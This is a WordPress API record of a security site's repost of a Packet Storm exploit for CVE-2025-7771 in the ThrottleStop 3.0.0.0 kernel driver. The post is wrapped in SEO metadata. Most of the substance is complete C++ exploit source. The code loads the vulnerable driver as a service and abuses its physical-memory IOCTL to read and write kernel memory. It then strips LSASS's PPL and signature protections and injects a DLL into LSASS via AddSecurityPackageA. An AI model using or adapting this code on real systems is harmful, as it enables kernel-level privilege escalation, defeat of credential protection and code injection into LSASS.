{"id":48740,"date":"2026-04-22T11:37:18","date_gmt":"2026-04-22T11:37:18","guid":{"rendered":"http:\/\/localhost\/?p=48740"},"modified":"2026-04-22T11:37:18","modified_gmt":"2026-04-22T11:37:18","slug":"throttlestop-kernel-driver-3000-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=48740","title":{"rendered":"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-22T16:28:36&#8243;,&#8221;description&#8221;:&#8221;Throttlestop Kernel Driver version 3.0.0.0 suffers from a privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219544&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-7771&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Throttlestop Kernel Driver &#8211; Kernel Out-of-Bounds Write Privilege Escalation \\n    # Exploit Details: https:\/\/xavibel.com\/2025\/12\/22\/using-vulnerable-drivers-in-red-team-exercises\/\\n    # Date: 8\/12\/2025\\n    # Exploit Author: Xavi Beltran\\n    # Vendor Homepage: https:\/\/www.techpowerup.com\/download\/techpowerup-throttlestop\/\\n    # Version: 3.0.0.0\\n    # Tested on: Windows 11\\n    # CVE-2025-7771\\n    \\n    #define WIN32_NO_STATUS\\n    #define SECURITY_WIN32\\n    #include \\u003cWindows.h\\u003e\\n    #include \\u003cPsapi.h\\u003e\\n    #include \\u003csuperfetch\/superfetch.h\\u003e\\n    #include \\u003ctlhelp32.h\\u003e\\n    #include \\u003cstring\\u003e\\n    #include \\u003csspi.h\\u003e\\n    \\n    # define IOCTL_MMMAPIOSPACE  0x8000645C\\n    #pragma comment(lib, \\&#8221;Secur32.lib\\&#8221;)\\n    \\n    #pragma pack(push,1)\\n    typedef struct {\\n        ULONGLONG PhysicalAddress; \/\/ +0\\n        DWORD     NumberOfBytes;   \/\/ +8\\n    } PHYS_REQ;                    \/\/ 0x0C\\n    #pragma pack(pop)\\n    \\n    \/\/ Struct needed to call nt!NtQueryIntervalProfile\\n    typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);\\n    \\n    LPVOID GetBaseAddr(LPCWSTR drvname)\\n    {\\n        LPVOID drivers[1024];\\n        DWORD cbNeeded;\\n        int nDrivers, i = 0;\\n        if (EnumDeviceDrivers(drivers, sizeof(drivers), \\u0026cbNeeded) \\u0026\\u0026 cbNeeded \\u003c sizeof(drivers))\\n        {\\n            WCHAR szDrivers[1024];\\n            nDrivers = cbNeeded \/ sizeof(drivers[0]);\\n            for (i = 0; i \\u003c nDrivers; i++)\\n            {\\n                if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) \/ sizeof(szDrivers[0])))\\n                {\\n                    if (wcscmp(szDrivers, drvname) == 0)\\n                    {\\n                        return drivers[i];\\n                    }\\n                }\\n            }\\n        }\\n        return 0;\\n    }\\n    \\n    uint64_t xRead(HANDLE hDrv, uint64_t virt_addr) {\\n        auto mm = spf::memory_map::current();\\n        if (!mm) {\\n            printf(\\&#8221;[!] Superfetch init failed!\\\\n\\&#8221;);\\n            return 0;\\n        }\\n    \\n        auto phys = mm-\\u003etranslate((void*)virt_addr);\\n        if (!phys) {\\n            printf(\\&#8221;[!] Translate failed for VA %p!\\\\n\\&#8221;, (void*)virt_addr);\\n            return 0;\\n        }\\n    \\n        \/\/printf(\\&#8221;[+] Virtual Adress=0x%016llx -\\u003e Physical Address 0x%016llx\\\\n\\&#8221;, virt_addr, phys);\\n        \/\/ &#8212; PHYSICAL READ &#8212;\\n        PHYS_REQ in{};\\n        in.PhysicalAddress = phys;\\n        in.NumberOfBytes = 0x8;\\n        ULONGLONG out = 0;\\n        DWORD br = 0;\\n        BOOL ok = DeviceIoControl(hDrv,\\n            IOCTL_MMMAPIOSPACE,\\n            \\u0026in, sizeof(in),    \/\/ 0x0C\\n            \\u0026out, sizeof(out), \/\/  Accepts 4 or 8\\n            \\u0026br, nullptr);\\n    \\n        \/\/printf(\\&#8221;[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\\\\n\\&#8221;, ok, br, GetLastError(), (unsigned long long)out);\\n        if (ok \\u0026\\u0026 br == 8 \\u0026\\u0026 out) {\\n            ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; \/\/ 8 bytes exactos\\n                  printf(\\&#8221;[+] READ WHERE: 0x%016llx | CONTENT: 0x%016llx\\\\n\\&#8221;, (unsigned long long)virt_addr, (unsigned long long)result);\\n            return result;\\n        }\\n    \\n        return -1;\\n    }\\n    \\n    uint64_t xWrite(HANDLE hDrv, uint64_t where, uint64_t what) {\\n        auto mm = spf::memory_map::current();\\n        if (!mm) {\\n            printf(\\&#8221;[!] Superfetch init failed!\\\\n\\&#8221;);\\n            return 0;\\n        }\\n    \\n        auto phys = mm-\\u003etranslate((void*)where);\\n        if (!phys) {\\n            printf(\\&#8221;[!] Translate failed for VA %p!\\\\n\\&#8221;, (void*)where);\\n            return 0;\\n        }\\n    \\n        \/\/printf(\\&#8221;[+] Virtual Adress=0x%016llx -\\u003e Physical Address 0x%016llx\\\\n\\&#8221;, where, phys);\\n        PHYS_REQ in{};\\n        in.PhysicalAddress = phys;\\n        in.NumberOfBytes = 0x8;\\n        ULONGLONG out = 0;\\n        DWORD br = 0;\\n        BOOL ok = DeviceIoControl(hDrv,\\n            IOCTL_MMMAPIOSPACE,\\n            \\u0026in, sizeof(in),    \/\/ 0x0C\\n            \\u0026out, sizeof(out), \/\/ 8 (Accepts 4 or 8)\\n            \\u0026br, nullptr);\\n    \\n        \/\/printf(\\&#8221;[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\\\\n\\&#8221;, ok, br, GetLastError(), (unsigned long long)out);\\n        if (ok \\u0026\\u0026 br == 8 \\u0026\\u0026 out) {\\n            ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; \/\/ 8 bytes exactos\\n        }\\n    \\n        \/\/ WRITE\\n        printf(\\&#8221;[+] WRITE WHAT: 0x%016llx | WHERE: 0x%016llx\\\\n\\&#8221;, (unsigned long long)what, (unsigned long long)where);\\n        *(uint64_t*)out = what;\\n        return 0;\\n    }\\n    \\n    DWORD FindProcessId(const std::wstring\\u0026 processName) {\\n        DWORD processId = 0;\\n        HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\\n        if (snapshot == INVALID_HANDLE_VALUE)\\n            return 0;\\n    \\n        PROCESSENTRY32W entry;\\n        entry.dwSize = sizeof(PROCESSENTRY32W);\\n    \\n        if (Process32FirstW(snapshot, \\u0026entry)) {\\n            do {\\n                if (!_wcsicmp(entry.szExeFile, processName.c_str())) {\\n                    processId = entry.th32ProcessID;\\n                    break;\\n                }\\n            } while (Process32NextW(snapshot, \\u0026entry));\\n        }\\n    \\n        CloseHandle(snapshot);\\n        return processId;\\n    }\\n    \\n    \\n    int main()\\n    {\\n        DWORD lsassPid = FindProcessId(L\\&#8221;lsass.exe\\&#8221;);\\n        printf(\\&#8221;[+] Target process PID: %d\\\\n\\&#8221;, lsassPid);\\n        \/\/Installing the service\\n    \\n        SC_HANDLE hSCManager;\\n        SC_HANDLE hService;\\n    \\n        \/\/ Open the Service Control Manager\\n        hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);\\n        if (hSCManager == NULL) {\\n            printf(\\&#8221;[!] Error opening SCM: %lu\\\\n\\&#8221;, GetLastError());\\n            return 1;\\n        }\\n    \\n        \/\/ Create the service\\n        hService = CreateService(\\n            hSCManager,               \\n            L\\&#8221;ThrottleStop\\&#8221;,          \\n            L\\&#8221;ThrottleStop\\&#8221;,           \\n            SERVICE_ALL_ACCESS,       \\n            SERVICE_KERNEL_DRIVER,    \\n            SERVICE_AUTO_START,       \\n            SERVICE_ERROR_NORMAL,    \\n            L\\&#8221;C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\a.sys\\&#8221;,\\n            NULL, NULL, NULL, NULL, NULL);\\n    \\n        if (hService == NULL) {\\n            printf(\\&#8221;[+] Error creating service: %lu\\\\n\\&#8221;, GetLastError());\\n            CloseServiceHandle(hSCManager);\\n            \/\/return 1;\\n        }\\n    \\n        printf(\\&#8221;[!] Service created successfully.\\\\n\\&#8221;);\\n    \\n        if (!StartService(hService, 0, NULL)) {\\n            printf(\\&#8221;[!] Error starting the service: %lu\\\\n\\&#8221;, GetLastError());\\n        }\\n        else {\\n            printf(\\&#8221;[+] Service started correctly.\\\\n\\&#8221;);\\n        }\\n    \\n        LPVOID nt_base = GetBaseAddr(L\\&#8221;ntoskrnl.exe\\&#8221;);\\n        printf(\\&#8221;[+] NT base: %p\\\\n\\&#8221;, nt_base);\\n    \\n        HANDLE hDrv = NULL;\\n        hDrv = CreateFileA(\\&#8221;\\\\\\\\\\\\\\\\.\\\\\\\\ThrottleStop\\&#8221;,\\n            (GENERIC_READ | GENERIC_WRITE),\\n            0x00,\\n            NULL,\\n            OPEN_EXISTING,\\n            FILE_ATTRIBUTE_NORMAL,\\n            NULL);\\n    \\n        if (hDrv == INVALID_HANDLE_VALUE)\\n        {\\n            printf(\\&#8221;[-] Failed to get a handle on driver!\\\\n\\&#8221;);\\n            return -1;\\n        }\\n        else {\\n            printf(\\&#8221;[+] Handle on  driver received!\\\\n\\&#8221;);\\n        }\\n    \\n        ULONGLONG result = 0x0;\\n    \\n        \/\/ nt!PsInitialSystemProcess nt + 0x5412e0\\n        ULONGLONG system_eprocess = ULONGLONG(nt_base) + 0x5412e0;\\n    \\n        DWORD64 Eprocess = xRead(hDrv, (uint64_t)system_eprocess);\\n        printf(\\&#8221;[+] EPROCESS: 0x%llX\\\\n\\&#8221;, Eprocess);\\n        DWORD64 CurrentProcessPid = xRead(hDrv, (uint64_t)system_eprocess + 0x2e0); \/\/ +0x2e0 UniqueProcessId : Ptr64 Void\\n    \\n        DWORD64 SearchProcessPid = 0;\\n        DWORD64 searchEprocess = Eprocess;\\n        while (1)\\n        {\\n            searchEprocess = xRead(hDrv, (uint64_t)searchEprocess + 0x2e8) &#8211; 0x2e8; \/\/ +0x2e8 ActiveProcessLinks : _LIST_ENTRY\\n            SearchProcessPid = xRead(hDrv, (uint64_t)searchEprocess + 0x2e0); \/\/ +0x2e0 UniqueProcessId : Ptr64 Void\\n            if (SearchProcessPid == lsassPid) \/\/ LSASS PROCESS\\n            {\\n                break;\\n            }\\n        }\\n    \\n        printf(\\&#8221;[+] Found LSASS EPROCESS!\\\\n\\&#8221;);\\n        printf(\\&#8221;[+] Removing PPL Protection&#8230;\\\\n\\&#8221;);\\n        xWrite(hDrv, (uint64_t)searchEprocess + 0x6ca, 0x0); \/\/ +0x6ca Protection : _PS_PROTECTION\\n        printf(\\&#8221;[+] Removing Signature Level Protection&#8230;\\\\n\\&#8221;);\\n        xWrite(hDrv, (uint64_t)searchEprocess + 0x6c8, 0x0);\/\/ +0x6c8 Protection : SignatureLevel : UChar\\n        printf(\\&#8221;[+] LSASS protections disabled\\\\n\\&#8221;);\\n        CloseHandle(hDrv);\\n    \\n        SECURITY_PACKAGE_OPTIONS spo = {};\\n        SECURITY_STATUS ss = AddSecurityPackageA((LPSTR)\\&#8221;c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\ntssp.dll\\&#8221;, \\u0026spo);\\n        printf(\\&#8221;[+] DLL Injection successful!\\\\n\\&#8221;);\\n    \\n        return 0;\\n    }&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219544&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:L\/AC:H\/AT:N\/PR:H\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219544\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-22T16:28:36&#8243;,&#8221;description&#8221;:&#8221;Throttlestop Kernel Driver version 3.0.0.0 suffers from a privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219544&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-7771&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Throttlestop Kernel Driver &#8211; Kernel Out-of-Bounds&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-48740","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=48740\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-22T16:28:36&#8243;,&#8221;description&#8221;:&#8221;Throttlestop Kernel Driver version 3.0.0.0 suffers from a privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219544&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-7771&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Throttlestop Kernel Driver &#8211; Kernel Out-of-Bounds...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=48740\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-22T11:37:18+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544\",\"datePublished\":\"2026-04-22T11:37:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740\"},\"wordCount\":1261,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48740#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740\",\"name\":\"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-22T11:37:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48740\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48740#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=48740","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-22T16:28:36&#8243;,&#8221;description&#8221;:&#8221;Throttlestop Kernel Driver version 3.0.0.0 suffers from a privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-22T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219544&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-7771&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: Throttlestop Kernel Driver &#8211; Kernel Out-of-Bounds...","og_url":"https:\/\/zero.redgem.net\/?p=48740","og_site_name":"zero redgem","article_published_time":"2026-04-22T11:37:18+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=48740#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=48740"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544","datePublished":"2026-04-22T11:37:18+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=48740"},"wordCount":1261,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=48740#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=48740","url":"https:\/\/zero.redgem.net\/?p=48740","name":"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-22T11:37:18+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=48740#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=48740"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=48740#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Throttlestop Kernel Driver 3.0.0.0 Privilege Escalation_PACKETSTORM:219544"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48740","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48740"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48740\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48740"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48740"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48740"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}